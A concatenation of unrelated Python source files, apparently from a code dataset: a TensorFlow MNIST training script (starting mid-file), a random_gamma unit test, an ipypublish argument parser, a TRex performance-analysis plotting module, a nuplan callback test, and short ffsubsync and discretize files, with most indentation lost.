with tf.name_scope('fc1'):
W_fc1 = weight_variable([4 * 4 * 20, 50])
b_fc1 = bias_variable([50])
h_pool2_flat = tf.reshape(h_pool2, [-1, 4 * 4 * 20])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
# Dropout - controls the complexity of the model, prevents co-adaptation of
# features.
with tf.name_scope('dropout'):
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
  # Map the 50 features to 10 classes, one for each digit
with tf.name_scope('fc2'):
W_fc2 = weight_variable([50, 10])
b_fc2 = bias_variable([10])
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
return y_conv, keep_prob
def conv2d(x, W):
"""conv2d returns a 2d convolution layer with full stride."""
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='VALID')
def max_pool_2x2(x):
"""max_pool_2x2 downsamples a feature map by 2X."""
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def weight_variable(shape):
"""weight_variable generates a weight variable of a given shape."""
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"""bias_variable generates a bias variable of a given shape."""
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def run(write_to):
print("this is the start of reading data")
startTime = time.time()
# Import data
mnist = input_data.read_data_sets(args.data_dir)
# Create the model
x = tf.placeholder(tf.float32, [None, 784])
# Define loss and optimizer
y_ = tf.placeholder(tf.int64, [None])
# Build the graph for the deep net
y_conv, keep_prob = deepnn(x)
with tf.name_scope('loss'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
labels=y_, logits=y_conv)
cross_entropy = tf.reduce_mean(cross_entropy)
  with tf.name_scope('optimizer'):
    # plain SGD (GradientDescentOptimizer) is used here, not Adam
    train_step = tf.train.GradientDescentOptimizer(args.lr).minimize(cross_entropy)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), y_)
correct_prediction = tf.cast(correct_prediction, tf.float32)
accuracy = tf.reduce_mean(correct_prediction)
#graph_location = tempfile.mkdtemp()
#print('Saving graph to: %s' % graph_location)
#train_writer = tf.summary.FileWriter(graph_location)
#train_writer.add_graph(tf.get_default_graph())
loopStart = time.time()
loss_save = []
with tf.Session(config=tf.ConfigProto(
intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1)) as sess:
sess.run(tf.global_variables_initializer())
for epoch in range(args.epochs):
train_accuracy = 0.0
start = time.time() * 1000
for i in range(60000 // args.batch_size):
batch = mnist.train.next_batch(args.batch_size)
_, loss = sess.run([train_step, cross_entropy], feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
#print(loss)
train_accuracy += loss
#if (i + 1) % 60 == 0:
# print('epoch %d: step %d, training loss %f' % (epoch + 1, i + 1, train_accuracy / (i * 100)))
stop = time.time() * 1000
print('Training completed in {}ms ({}ms/image)'.format(int(stop - start), (stop - start)/60000))
average_loss = train_accuracy / (60000 / args.batch_size)
print('average loss is %s' % average_loss)
loss_save.append(average_loss)
#start = time.time() * 1000
#tloss = 0
#tacc = 0
#for i in range(100):
# batch = mnist.test.next_batch(100)
# loss, acc = sess.run([cross_entropy, accuracy], feed_dict={
# x: batch[0], y_: batch[1], keep_prob: 1.0})
# tloss += loss
# tacc += acc
#stop = time.time() * 1000
#print('Epoch %d: test accuracy %d/10000. Average loss %f' % (epoch + 1, tacc, tloss / 10000))
#print('Testing completed in {}ms ({}ms/image)'.format(int(stop - start), (stop - start)/10000))
loopEnd = time.time()
prepareTime = loopStart - startTime
loopTime = loopEnd - loopStart
timePerEpoch = loopTime / args.epochs
with open(write_to, "w") as f:
f.write("unit: " + "1 epoch\n")
for loss in loss_save:
f.write(str(loss) + "\n")
f.write("run time: " + str(prepareTime) + " " + str(timePerEpoch) + "\n")
if __name__ == '__main__':
# Training settings
  parser = argparse.ArgumentParser(description='TensorFlow MNIST Example')
parser.add_argument('--batch-size', type=int, default=100, metavar='N',
                      help='input batch size for training (default: 100)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.05, metavar='LR',
                      help='learning rate (default: 0.05)')
parser.add_argument('--momentum', type=float, default=0.0, metavar='M',
                      help='SGD momentum (default: 0.0)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=42, metavar='S',
                      help='random seed (default: 42)')
parser.add_argument('--log-interval', type=int, default=6000, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--data_dir', type=str,
default='./input_data',
help='Directory for storing input data')
args = parser.parse_args()
import os
if not os.path.exists(args.data_dir):
# only try to download the data here
input_data.read_data_sets(args.data_dir)
run("result_TensorFlow"+str(args.batch_size)+".txt")
#if __name__ == '__main__':
# parser = argparse.ArgumentParser()
# parser.add_argument('--data_dir', type=str,
# default='/tmp/tensorflow/mnist/input_data',
## help='Directory for storing input data')
# FLAGS, unparsed = parser.parse_known_args()
# tf.app.run(main=main, argv=[sys.argv[0]] + unparsed) |
jni-build/jni/include/tensorflow/python/kernel_tests/random_gamma_test.py | rcelebi/android-elfali | 680 | 11195234 | <filename>jni-build/jni/include/tensorflow/python/kernel_tests/random_gamma_test.py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.random_ops.random_gamma."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
class RandomGammaTest(tf.test.TestCase):
"""This is a medium test due to the moments computation taking some time."""
def _Sampler(self, num, alpha, beta, dtype, use_gpu, seed=None):
def func():
with self.test_session(use_gpu=use_gpu, graph=tf.Graph()) as sess:
rng = tf.random_gamma([num], alpha, beta=beta, dtype=dtype, seed=seed)
ret = np.empty([10, num])
for i in xrange(10):
ret[i, :] = sess.run(rng)
return ret
return func
"""
We are not currently allowing scipy in core TF tests.
def testMoments(self):
try:
from scipy import stats # pylint: disable=g-import-not-at-top
z_limit = 6.0
for dt in tf.float16, tf.float32, tf.float64:
for stride in 0, 1, 4, 17:
for alpha in .5, 3.:
for scale in 11, 21:
# Gamma moments only defined for values less than the scale param.
max_moment = scale // 2
sampler = self._Sampler(1000,
alpha,
1 / scale,
dt,
use_gpu=False,
seed=12345)
moments = [0] * (max_moment + 1)
moments_sample_count = [0] * (max_moment + 1)
x = np.array(sampler().flat) # sampler does 10x samples
for k in range(len(x)):
moment = 1.
for i in range(max_moment + 1):
index = k + i * stride
if index >= len(x):
break
moments[i] += moment
moments_sample_count[i] += 1
moment *= x[index]
for i in range(max_moment + 1):
moments[i] /= moments_sample_count[i]
for i in range(1, max_moment + 1):
g = stats.gamma(alpha, scale=scale)
if stride == 0:
moments_i_mean = g.moment(i)
moments_i_squared = g.moment(2 * i)
else:
moments_i_mean = pow(g.moment(1), i)
moments_i_squared = pow(g.moment(2), i)
moments_i_var = (
moments_i_squared - moments_i_mean * moments_i_mean)
# Assume every operation has a small numerical error.
# It takes i multiplications to calculate one i-th moment.
error_per_moment = i * 1e-6
total_variance = (
moments_i_var / moments_sample_count[i] + error_per_moment)
if not total_variance:
total_variance = 1e-10
# z_test is approximately a unit normal distribution.
z_test = abs(
(moments[i] - moments_i_mean) / math.sqrt(total_variance))
self.assertLess(z_test, z_limit)
except ImportError as e:
tf.logging.warn('Cannot test stats functions: %s' % str(e))
"""
  # Asserts that different trials (1000 samples per trial) are unlikely
  # to produce the same sequence of values. Will catch buggy
  # implementations which use the same random number seed.
def testDistinct(self):
for use_gpu in [False, True]:
for dt in tf.float16, tf.float32, tf.float64:
sampler = self._Sampler(1000, 2.0, 1.0, dt, use_gpu=use_gpu)
x = sampler()
y = sampler()
        # Number of samples that are identical between the two draws.
count = (x == y).sum()
count_limit = 20 if dt == tf.float16 else 10
if count >= count_limit:
print(use_gpu, dt)
print("x = ", x)
print("y = ", y)
print("count = ", count)
self.assertLess(count, count_limit)
# Checks that the CPU and GPU implementation returns the same results,
# given the same random seed
def testCPUGPUMatch(self):
for dt in tf.float16, tf.float32, tf.float64:
results = {}
for use_gpu in [False, True]:
sampler = self._Sampler(1000, 0.0, 1.0, dt, use_gpu=use_gpu, seed=12345)
results[use_gpu] = sampler()
if dt == tf.float16:
self.assertAllClose(results[False], results[True], rtol=1e-3, atol=1e-3)
else:
self.assertAllClose(results[False], results[True], rtol=1e-6, atol=1e-6)
def testSeed(self):
for use_gpu in [False, True]:
for dt in tf.float16, tf.float32, tf.float64:
sx = self._Sampler(1000, 0.0, 1.0, dt, use_gpu=use_gpu, seed=345)
sy = self._Sampler(1000, 0.0, 1.0, dt, use_gpu=use_gpu, seed=345)
self.assertAllEqual(sx(), sy())
def testNoCSE(self):
"""CSE = constant subexpression eliminator.
SetIsStateful() should prevent two identical random ops from getting
merged.
"""
for dtype in tf.float16, tf.float32, tf.float64:
for use_gpu in [False, True]:
with self.test_session(use_gpu=use_gpu):
rnd1 = tf.random_gamma([24], 2.0, dtype=dtype)
rnd2 = tf.random_gamma([24], 2.0, dtype=dtype)
diff = rnd2 - rnd1
self.assertGreater(np.linalg.norm(diff.eval()), 0.1)
def testShape(self):
# Fully known shape.
rnd = tf.random_gamma([150], 2.0)
self.assertEqual([150], rnd.get_shape().as_list())
rnd = tf.random_gamma([150], 2.0, beta=[3.0, 4.0])
self.assertEqual([150, 2], rnd.get_shape().as_list())
rnd = tf.random_gamma([150], tf.ones([1, 2, 3]))
self.assertEqual([150, 1, 2, 3], rnd.get_shape().as_list())
rnd = tf.random_gamma([20, 30], tf.ones([1, 2, 3]))
self.assertEqual([20, 30, 1, 2, 3], rnd.get_shape().as_list())
rnd = tf.random_gamma([123], tf.placeholder(tf.float32, shape=(2,)))
self.assertEqual([123, 2], rnd.get_shape().as_list())
# Partially known shape.
rnd = tf.random_gamma(tf.placeholder(tf.int32, shape=(1,)), tf.ones([7, 3]))
self.assertEqual([None, 7, 3], rnd.get_shape().as_list())
rnd = tf.random_gamma(tf.placeholder(tf.int32, shape=(3,)), tf.ones([9, 6]))
self.assertEqual([None, None, None, 9, 6], rnd.get_shape().as_list())
# Unknown shape.
rnd = tf.random_gamma(tf.placeholder(tf.int32), tf.placeholder(tf.float32))
self.assertIs(None, rnd.get_shape().ndims)
rnd = tf.random_gamma([50], tf.placeholder(tf.float32))
self.assertIs(None, rnd.get_shape().ndims)
if __name__ == "__main__":
tf.test.main()
|
ipypublish/frontend/shared.py | parmentelat/ipypublish | 220 | 11195235 | <filename>ipypublish/frontend/shared.py
import sys
import os
import argparse
import fnmatch
from ipypublish import __version__
from ipypublish.convert.config_manager import iter_all_export_infos
class CustomFormatter(
argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter
):
pass
class CustomParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write("error: %s\n" % message)
self.print_help()
sys.exit(2)
def get_parser(**kwargs):
return CustomParser(formatter_class=CustomFormatter, **kwargs)
def get_plugin_str(plugin_folder_paths, regex, verbose):
"""return string listing all available export configurations """
outstrs = []
# outstrs.append('Available Export Configurations')
# outstrs.append('-------------------------------')
configs = [
e
for e in iter_all_export_infos(plugin_folder_paths, get_mime=verbose)
if fnmatch.fnmatch(e["key"], "*{}*".format(regex))
]
for item in sorted(configs, key=lambda i: (i["class"], i["key"])):
outstrs.append("- Key: {}".format(item["key"]))
outstrs.append(" Class: {}".format(item["class"]))
path = item["path"].split(os.path.sep)
if verbose:
outstrs.append(" Type: {}".format(item["mime_type"]))
path = os.path.join(*path)
else:
path = os.path.join("...", *path[-3:])
if len(path) < 4:
outstrs.append(" Path: {}".format(item["path"]))
else:
outstrs.append(" Path: {}".format(path))
outstrs.append(" About: {}".format(item["description"][0].strip()))
if verbose:
for descript in item["description"][1:]:
outstrs.append(" {}".format(descript.strip()))
# note could wrap description (less than x characters)
outstrs.append(" ")
return "\n".join(outstrs)
def parse_options(sys_args, program):
if program not in ["nbpublish", "nbpresent"]:
raise ValueError("program should be nbpublish or nbpresent")
if program == "nbpresent":
parser = get_parser(
description=(
"load reveal.js slides as a web server,\n"
"converting from ipynb first "
"if path extension is `ipynb`"
)
)
file_help = "path to html or ipynb file"
default_key = "slides_ipypublish_main"
else:
parser = get_parser(
description=(
"convert one or more Jupyter notebooks " "to a publishable format"
)
)
file_help = "notebook file or directory"
default_key = "latex_ipypublish_main"
parser.add_argument("--version", action="version", version=__version__)
parser.add_argument(
"filepath", type=str, nargs="?", help=file_help, metavar="filepath"
)
parser.add_argument(
"-f",
"--outformat",
type=str,
metavar="key|filepath",
help=(
"export format configuration to use, "
"can be a key name or path to the file"
),
default=default_key,
)
export_group = parser.add_argument_group("export configurations")
export_group.add_argument(
"-ep",
"--export-paths",
action="append",
metavar="path",
type=str,
help=("add additional folder paths, " "containing export configurations"),
default=[],
)
export_group.add_argument(
"-le",
"--list-exporters",
type=str,
metavar="filter",
nargs="?",
const="*",
help=("list export configurations, " "optionally filtered e.g. -le html*"),
)
export_group.add_argument(
"-lv",
"--list-verbose",
action="store_true",
help=("when listing export configurations, " "give a verbose description"),
)
nbmerge_group = parser.add_argument_group("nb merge")
nbmerge_group.add_argument(
"-i",
"--ignore-prefix",
type=str,
metavar="str",
default="_",
help="ignore ipynb files with this prefix",
)
output_group = parser.add_argument_group("output")
output_group.add_argument(
"-o",
"--outpath",
type=str,
metavar="str",
help="path to output converted files",
default=os.path.join(os.getcwd(), "converted"),
)
# output_group.add_argument("-d","--dump-files", action="store_true",
# help='dump external files, '
# 'linked to in the document, into the outpath')
output_group.add_argument(
"-c",
"--clear-files",
action="store_true",
help=("clear any external files " "that already exist in the outpath"),
)
if program == "nbpublish":
pdf_group = parser.add_argument_group("pdf export")
pdf_group.add_argument(
"-pdf",
"--create-pdf",
action="store_true",
help="convert to pdf (only if latex exporter)",
)
pdf_group.add_argument(
"-ptemp",
"--pdf-in-temp",
action="store_true",
help=(
"run pdf conversion in a temporary folder"
" and only copy back the .pdf file"
),
)
pdf_group.add_argument(
"-pbug",
"--pdf-debug",
action="store_true",
help="run latexmk in interactive mode",
)
view_group = parser.add_argument_group("view output")
view_group.add_argument(
"-lb",
"--launch-browser",
action="store_true",
help="open the output in an available web-browser",
)
debug_group = parser.add_argument_group("debugging")
debug_group.add_argument(
"-log",
"--log-level",
type=str,
default="info",
choices=["debug", "info", "warning", "error"],
help="the logging level to output to screen/file",
)
debug_group.add_argument(
"-pt",
"--print-traceback",
action="store_true",
help=("print the full exception traceback"),
)
debug_group.add_argument(
"-dr",
"--dry-run",
action="store_true",
help=("perform a 'dry run', " "which will not output any files"),
)
args = parser.parse_args(sys_args)
options = vars(args)
filepath = options.pop("filepath")
list_plugins = options.pop("list_exporters")
list_verbose = options.pop("list_verbose")
if filepath is None and list_plugins:
parser.exit(
message=get_plugin_str(options["export_paths"], list_plugins, list_verbose)
)
elif filepath is None:
parser.error("no filepath specified")
return filepath, options
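# A minimal illustrative call (sketch only; the notebook path is a hypothetical placeholder):
#
#     filepath, options = parse_options(
#         ["notebook.ipynb", "-f", "latex_ipypublish_main", "-o", "converted"], "nbpublish")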
|
doc/TRexDataAnalysis.py | timgates42/trex-core | 956 | 11195241 | #!/scratch/Anaconda2.4.0/bin/python
import pandas as pd
import numpy as np
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
from matplotlib import dates as matdates
from matplotlib import lines as matlines
import os
import time
from datetime import datetime
"""
This module is structured to work with raw data in the following JSON format:
{'setup_name': {'test1_name':[QUERY1,QUERY2,QUERY3],
'test2_name':[QUERY1,QUERY2,QUERY3]
}
'setup_name2': {'test1_name':[QUERY1,QUERY2,QUERY3],
'test2_name':[QUERY1,QUERY2,QUERY3]
}
}
The query structure is currently set to this:
(test_name, state, date, hour, minute, mpps_result, mpps_min, mpps_max, build_id), for example:
["syn attack - 64 bytes, single CPU", "stl", "20161226", "01", "39", "9.631898", "9.5", "11.5", "54289"]
It can be changed to support other query formats; simply change the query class to match your desired structure.
The query class specifies the indexes of the data within the query tuple.
"""
class TestQuery(object):
QUERY_TIMEFORMAT = "%Y/%m/%d %H:%M:%S" # date format in the query
QUERY_TIMESTAMP = 1
QUERY_MPPS_RESULT = 2
QUERY_BUILD_ID = 3
class Test:
def __init__(self, name, setup_name, end_date):
self.name = name
self.setup_name = setup_name
self.end_date = end_date
self.stats = [] # tuple
self.results_df = [] # dataFrame
self.latest_result = [] # float
self.latest_result_date = '' # string
def analyze_all_test_data(self, raw_test_data):
test_results = []
test_dates = []
test_build_ids = []
for query in raw_test_data:
# date_formatted = time.strftime("%d-%m-%Y",
# time.strptime(query[int(TestQuery.QUERY_DATE)], TestQuery.query_dateformat))
# time_of_res = date_formatted + '-' + query[int(TestQuery.QUERY_HOUR)] + ':' + query[
# int(TestQuery.QUERY_MINUTE)]
time_of_query = time.strptime(query[TestQuery.QUERY_TIMESTAMP], TestQuery.QUERY_TIMEFORMAT)
time_formatted = time.strftime("%d-%m-%Y-%H:%M", time_of_query)
test_dates.append(time_formatted)
test_results.append(float(query[int(TestQuery.QUERY_MPPS_RESULT)]))
test_build_ids.append(query[int(TestQuery.QUERY_BUILD_ID)])
test_results_df = pd.DataFrame({self.name: test_results, self.name + ' Date': test_dates,
"Setup": ([self.setup_name] * len(test_results)), "Build Id": test_build_ids},
dtype='str')
stats_avg = float(test_results_df[self.name].mean())
stats_min = float(test_results_df[self.name].min())
stats_max = float(test_results_df[self.name].max())
stats = tuple(
[stats_avg, stats_min, stats_max,
float(test_results_df[self.name].std()),
float(((stats_max - stats_min) / stats_avg) * 100),
len(test_results)]) # stats = (avg_mpps,min,max,std,error, no of test_results) error = ((max-min)/avg)*100
self.latest_result = float(test_results_df[self.name].iloc[-1])
self.latest_result_date = str(test_results_df[test_results_df.columns[3]].iloc[-1])
self.results_df = test_results_df
self.stats = stats
class Setup:
def __init__(self, name, end_date, raw_setup_data):
self.name = name
self.end_date = end_date # string of date
self.tests = [] # list of test objects
self.all_tests_data_table = pd.DataFrame() # dataframe
self.setup_trend_stats = pd.DataFrame() # dataframe
self.latest_test_results = pd.DataFrame() # dataframe
self.raw_setup_data = raw_setup_data # dictionary
self.test_names = raw_setup_data.keys() # list of names
def analyze_all_tests(self):
for test_name in self.test_names:
t = Test(test_name, self.name, self.end_date)
t.analyze_all_test_data(self.raw_setup_data[test_name])
self.tests.append(t)
def analyze_latest_test_results(self):
test_names = []
test_dates = []
test_latest_results = []
for test in self.tests:
test_names.append(test.name)
test_dates.append(test.latest_result_date)
test_latest_results.append(test.latest_result)
self.latest_test_results = pd.DataFrame(
{'Date': test_dates, 'Test Name': test_names, 'MPPS\Core (Norm)': test_latest_results},
index=range(1, len(test_latest_results) + 1))
self.latest_test_results = self.latest_test_results[[2, 1, 0]] # re-order columns to name|MPPS|date
def analyze_all_tests_stats(self):
test_names = []
all_test_stats = []
for test in self.tests:
test_names.append(test.name)
all_test_stats.append(test.stats)
self.setup_trend_stats = pd.DataFrame(all_test_stats, index=test_names,
columns=['Avg MPPS/Core (Norm)', 'Min', 'Max', 'Std', 'Error (%)',
'Total Results'])
self.setup_trend_stats.index.name = 'Test Name'
def analyze_all_tests_trend(self):
all_tests_trend_data = []
for test in self.tests:
all_tests_trend_data.append(test.results_df)
self.all_tests_data_table = reduce(lambda x, y: pd.merge(x, y, how='outer'), all_tests_trend_data)
def plot_trend_graph_all_tests(self, save_path='', file_name='_trend_graph.png'):
time_format1 = '%d-%m-%Y-%H:%M'
time_format2 = '%Y-%m-%d-%H:%M'
for test in self.tests:
test_data = test.results_df[test.results_df.columns[2]].tolist()
test_time_stamps = test.results_df[test.results_df.columns[3]].tolist()
start_date = test_time_stamps[0]
test_time_stamps.append(self.end_date + '-23:59')
test_data.append(test_data[-1])
float_test_time_stamps = []
for ts in test_time_stamps:
try:
float_test_time_stamps.append(matdates.date2num(datetime.strptime(ts, time_format1)))
except:
float_test_time_stamps.append(matdates.date2num(datetime.strptime(ts, time_format2)))
plt.plot_date(x=float_test_time_stamps, y=test_data, label=test.name, fmt='.-', xdate=True)
plt.legend(fontsize='small', loc='best')
plt.ylabel('MPPS/Core (Norm)')
plt.title('Setup: ' + self.name)
plt.tick_params(
axis='x',
which='both',
bottom='off',
top='off',
labelbottom='off')
plt.xlabel('Time Period: ' + start_date[:-6] + ' - ' + self.end_date)
if save_path:
plt.savefig(os.path.join(save_path, self.name + file_name))
if not self.setup_trend_stats.empty:
(self.setup_trend_stats.round(2)).to_csv(os.path.join(save_path, self.name +
'_trend_stats.csv'))
plt.close('all')
def plot_latest_test_results_bar_chart(self, save_path='', img_file_name='_latest_test_runs.png',
stats_file_name='_latest_test_runs_stats.csv'):
plt.figure()
colors_for_bars = ['b', 'g', 'r', 'c', 'm', 'y']
self.latest_test_results[[1]].plot(kind='bar', legend=False,
color=colors_for_bars) # plot only mpps data, which is in column 1
plt.xticks(rotation='horizontal')
plt.xlabel('Index of Tests')
plt.ylabel('MPPS/Core (Norm)')
plt.title("Test Runs for Setup: " + self.name)
if save_path:
plt.savefig(os.path.join(save_path, self.name + img_file_name))
(self.latest_test_results.round(2)).to_csv(
os.path.join(save_path, self.name + stats_file_name))
plt.close('all')
def analyze_all_setup_data(self):
self.analyze_all_tests()
self.analyze_latest_test_results()
self.analyze_all_tests_stats()
self.analyze_all_tests_trend()
def plot_all(self, save_path=''):
self.plot_latest_test_results_bar_chart(save_path)
self.plot_trend_graph_all_tests(save_path)
def latest_runs_comparison_bar_chart(setup_name1, setup_name2, setup1_latest_result, setup2_latest_result,
save_path=''
):
s1_res = setup1_latest_result[[0, 1]] # column0 is test name, column1 is MPPS\Core
s2_res = setup2_latest_result[[0, 1, 2]] # column0 is test name, column1 is MPPS\Core, column2 is Date
s1_res.columns = ['Test Name', setup_name1]
s2_res.columns = ['Test Name', setup_name2, 'Date']
compare_dframe = pd.merge(s1_res, s2_res, on='Test Name')
compare_dframe.plot(kind='bar')
plt.legend(fontsize='small', loc='best')
plt.xticks(rotation='horizontal')
plt.xlabel('Index of Tests')
plt.ylabel('MPPS/Core (Norm)')
plt.title("Comparison between " + setup_name1 + " and " + setup_name2)
if save_path:
plt.savefig(os.path.join(save_path, "_comparison.png"))
compare_dframe = compare_dframe.round(2)
compare_dframe.to_csv(os.path.join(save_path, '_comparison_stats_table.csv'))
# WARNING: if the file _detailed_table.csv already exists, this script deletes it to prevent stale data from accumulating
def create_all_data(ga_data, end_date, save_path='', detailed_test_stats=False):
all_setups = {}
all_setups_data = []
setup_names = ga_data.keys()
for setup_name in setup_names:
s = Setup(setup_name, end_date, ga_data[setup_name])
s.analyze_all_setup_data()
s.plot_all(save_path)
all_setups_data.append(s.all_tests_data_table)
all_setups[setup_name] = s
if detailed_test_stats:
if os.path.exists(os.path.join(save_path, '_detailed_table.csv')):
os.remove(os.path.join(save_path, '_detailed_table.csv'))
if all_setups_data:
all_setups_data_dframe = pd.DataFrame().append(all_setups_data)
all_setups_data_dframe.to_csv(os.path.join(save_path, '_detailed_table.csv'))
trex19setup = all_setups['trex19']
trex08setup = all_setups['trex08']
latest_runs_comparison_bar_chart('Mellanox ConnectX-5',
'Intel XL710', trex19setup.latest_test_results,
trex08setup.latest_test_results,
save_path=save_path)
|
nuplan/planning/training/callbacks/utils/test/test_scenario_scoring_callback.py | motional/nuplan-devkit | 128 | 11195257 | <gh_stars>100-1000
import json
import pathlib
import tempfile
import unittest
from typing import Tuple
from unittest.mock import Mock
import torch
from nuplan.common.actor_state.state_representation import StateSE2
from nuplan.planning.scenario_builder.abstract_scenario import AbstractScenario
from nuplan.planning.scenario_builder.test.mock_abstract_scenario import MockAbstractScenario
from nuplan.planning.training.callbacks.scenario_scoring_callback import ScenarioScoringCallback, _score_model
from nuplan.planning.training.callbacks.utils.scenario_scene_converter import ScenarioSceneConverter
from nuplan.planning.training.data_loader.scenario_dataset import ScenarioDataset
from nuplan.planning.training.modeling.types import FeaturesType, TargetsType
from nuplan.planning.training.preprocessing.test.dummy_vectormap_builder import DummyVectorMapFeature
def mock_compute_features(scenario: AbstractScenario) -> Tuple[FeaturesType, TargetsType]:
"""
Mock feature computation.
:param scenario: Input scenario to extract features from.
:return: Extracted features and targets.
"""
mission_goal = scenario.get_mission_goal()
data1 = torch.tensor(mission_goal.x)
data2 = torch.tensor(mission_goal.y)
data3 = torch.tensor(mission_goal.heading)
mock_feature = DummyVectorMapFeature(data1=[data1], data2=[data2], data3=[{"test": data3}])
mock_output = {'mock_feature': mock_feature}
return mock_output, mock_output
def mock_predict(features: FeaturesType) -> FeaturesType:
"""
Mock prediction function.
:param features: Input feature tensor.
:return: Predicted tensor.
"""
return features
def mock_compute_objective(prediction: FeaturesType, target: TargetsType) -> torch.Tensor:
"""
Mock computation of objective.
:param prediction: Prediction tensor.
:param target: Target tensor.
:return: Computed objective tensor.
"""
return target['mock_feature'].data1[0]
class TestScenarioScoringCallback(unittest.TestCase):
"""Test scenario scoring callback"""
def setUp(self) -> None:
"""Set up test case."""
self.output_dir = tempfile.TemporaryDirectory()
# setup scenario dataset
preprocessor = Mock()
preprocessor.compute_features.side_effect = mock_compute_features
self.mock_scenarios = [
MockAbstractScenario(mission_goal=StateSE2(x=1.0, y=0.0, heading=0.0)),
MockAbstractScenario(mission_goal=StateSE2(x=0.0, y=0.0, heading=0.0)),
]
self.scenario_time_stamp = self.mock_scenarios[0]._initial_time_us
self.scenario_token = self.mock_scenarios[0].token
mock_scenario_dataset = ScenarioDataset(scenarios=self.mock_scenarios, feature_preprocessor=preprocessor)
# setup datamodule
mock_datamodule = Mock()
mock_datamodule.val_dataloader().dataset = mock_scenario_dataset
# setup trainer
self.trainer = Mock()
self.trainer.datamodule = mock_datamodule
self.trainer.current_epoch = 1
# setup objective
mock_objective = Mock()
mock_objective.compute.side_effect = mock_compute_objective
# setup lightning module
self.pl_module = Mock()
self.pl_module.device = "cpu"
self.pl_module.side_effect = mock_predict
self.pl_module.objectives = [mock_objective]
# setup callback
scenario_converter = ScenarioSceneConverter(ego_trajectory_horizon=1, ego_trajectory_poses=2)
self.callback = ScenarioScoringCallback(
scene_converter=scenario_converter, num_store=1, frequency=1, output_dir=self.output_dir.name
)
self.callback._initialize_dataloaders(self.trainer.datamodule)
def test_initialize_dataloaders(self) -> None:
"""
Test callback dataloader initialization.
"""
invalid_datamodule = Mock()
invalid_datamodule.val_dataloader().dataset = None
# test invalid dataset assertion
with self.assertRaises(AssertionError):
self.callback._initialize_dataloaders(invalid_datamodule)
# test valid dataset instance
self.callback._initialize_dataloaders(self.trainer.datamodule)
self.assertIsInstance(self.callback._val_dataloader, torch.utils.data.DataLoader)
def test_score_model(self) -> None:
"""
Test scoring of the model with mock features.
"""
data1 = torch.tensor(1)
data2 = torch.tensor(2)
data3 = torch.tensor(3)
mock_feature = DummyVectorMapFeature(data1=[data1], data2=[data2], data3=[{"test": data3}])
mock_input = {'mock_feature': mock_feature}
score, prediction = _score_model(self.pl_module, mock_input, mock_input)
self.assertEqual(score, mock_feature.data1[0])
self.assertEqual(prediction, mock_input)
def test_on_validation_epoch_end(self) -> None:
"""
Test on validation callback.
"""
self.callback._initialize_dataloaders(self.trainer.datamodule)
self.callback.on_validation_epoch_end(self.trainer, self.pl_module)
# Assert files are generated
best_score_path = pathlib.Path(
self.output_dir.name
+ f"/scenes/epoch={self.trainer.current_epoch}"
+ f"/best/{self.scenario_token}/{self.scenario_time_stamp.time_us}.json"
)
self.assertTrue(best_score_path.exists())
worst_score_path = pathlib.Path(
self.output_dir.name
+ f"/scenes/epoch={self.trainer.current_epoch}"
+ f"/worst/{self.scenario_token}/{self.scenario_time_stamp.time_us}.json"
)
self.assertTrue(worst_score_path.exists())
random_score_path = pathlib.Path(
self.output_dir.name
+ f"/scenes/epoch={self.trainer.current_epoch}"
+ f"/random/{self.scenario_token}/{self.scenario_time_stamp.time_us}.json"
)
self.assertTrue(random_score_path.exists())
# Make sure the right json files are generated
with open(str(best_score_path), "r") as f:
best_data = json.load(f)
with open(str(worst_score_path), "r") as f:
worst_data = json.load(f)
self.assertEqual(worst_data["goal"]["pose"][0], self.mock_scenarios[0].get_mission_goal().x)
self.assertEqual(best_data["goal"]["pose"][0], self.mock_scenarios[1].get_mission_goal().x)
if __name__ == '__main__':
unittest.main()
|
ffsubsync/__init__.py | Lucas-C/ffsubsync | 4,533 | 11195267 | # -*- coding: utf-8 -*-
import logging
import sys
try:
from rich.console import Console
from rich.logging import RichHandler
    # configure logging here, because otherwise another library imported later would configure it first
# TODO: use a fileconfig
logging.basicConfig(
level=logging.INFO,
format="%(message)s",
datefmt="[%X]",
handlers=[RichHandler(console=Console(file=sys.stderr))],
)
except ImportError:
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
from .version import __version__ # noqa
from .ffsubsync import main # noqa
|
tests/base/test_tensor_omf.py | ckohnke/discretize | 123 | 11195284 | <gh_stars>100-1000
import numpy as np
import unittest
import discretize
try:
import omf
except ImportError:
has_omf = False
else:
has_omf = True
if has_omf:
from discretize.mixins.omf_mod import unravel_data_array, ravel_data_array
class TestTensorMeshOMF(unittest.TestCase):
def setUp(self):
